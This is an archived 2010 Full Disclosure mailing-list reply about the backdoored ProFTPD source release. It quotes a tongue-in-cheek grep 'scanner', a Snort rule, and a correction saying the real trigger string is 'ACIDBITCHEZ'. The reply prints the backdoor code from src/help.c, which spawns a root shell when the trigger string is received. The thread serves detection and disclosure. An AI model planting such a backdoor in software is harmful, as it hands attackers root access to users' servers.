Full Disclosure mailing list archives
Re: New Source Code Vulnerability Scanner (Free 30 Day Trial)
From: Michael McGraw-Herdeg <mherdeg () mit edu>
Date: Thu, 2 Dec 2010 11:48:26 -0800
Hi, You might want to make the below patch: ======== @@ -9,7 +9,7 @@ # online store. # # 50% of all proceeds will go to the victims that have been -# owned by ACIDBITCHES within the past 6 years. +# owned by ACIDBITCHEZ within the past 6 years. # ################################################################### @@ -17,4 +17,4 @@ export PATH=/bin -grep -r ACIDBITCHES * +grep -r ACIDBITCHEZ * ==== The snort rule you link to is checking for "HELP ACIDBITCHES", I believe incorrectly, as the compromised code actually appears to trigger on the string "ACIDBITCHEZ". Snort sig (...BITCHES, http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965) "" alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHES)"; flow:established,to_server; content:"HELP ACIDBITCHES"; depth:16; nocase; classtype: trojan-activity; "" The compromise (...BITCHEZ, http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/, http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in src/help.c: "" } else if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); } /* List the syntax for the given target command. */ "" Thanks! On Thu, Dec 2, 2010 at 10:18 AM, <vulnscan () hushmail com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Esteemed members of the Full Disclosure mailing list, In the wake of the recent compromise of the ProFTPd distribution server and the subsequent root-level backdoor that was placed into the source[0], we are proud to announce a cutting edge source code scanner that will help you detect backdoors in your code. This code is free to use for 30 days, after which time you must pay for it. - ------------- el8 Vuln Scan v.0.1 ------------- #!/bin/bash ################################################################### # # Place this script inside the top level directory of your # source code repo. # # Please delete this after 30 days, or purchase a copy from our # online store. # # 50% of all proceeds will go to the victims that have been # owned by ACIDBITCHES within the past 6 years. # ################################################################### # main export PATH=/bin grep -r ACIDBITCHES * - ------------- el8 Vuln Scan v.0.1 ------------- Thank you for helping us to help you make the Internet a safer place. [0] http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging- sigs/7965 -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h 7KFZMWU= =mJJI -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New Source Code Vulnerability Scanner (Free 30 Day Trial) vulnscan (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Eyeballing Weev (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) netinfinity (Dec 02)
- Message not available
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) netinfinity (Dec 02)
- Message not available
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Jens Christian Hillerup (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Cal Leeming [Simplicity Media Ltd] (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) dave b (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Cal Leeming [Simplicity Media Ltd] (Dec 03)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) dave b (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Michael McGraw-Herdeg (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) IA64 LOL (Dec 02)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Michal Zalewski (Dec 03)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Georgi Guninski (Dec 04)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) netinfinity (Dec 04)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Georgi Guninski (Dec 04)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Adam Kration (Dec 05)
- Re: New Source Code Vulnerability Scanner (Free 30 Day Trial) Georgi Guninski (Dec 04)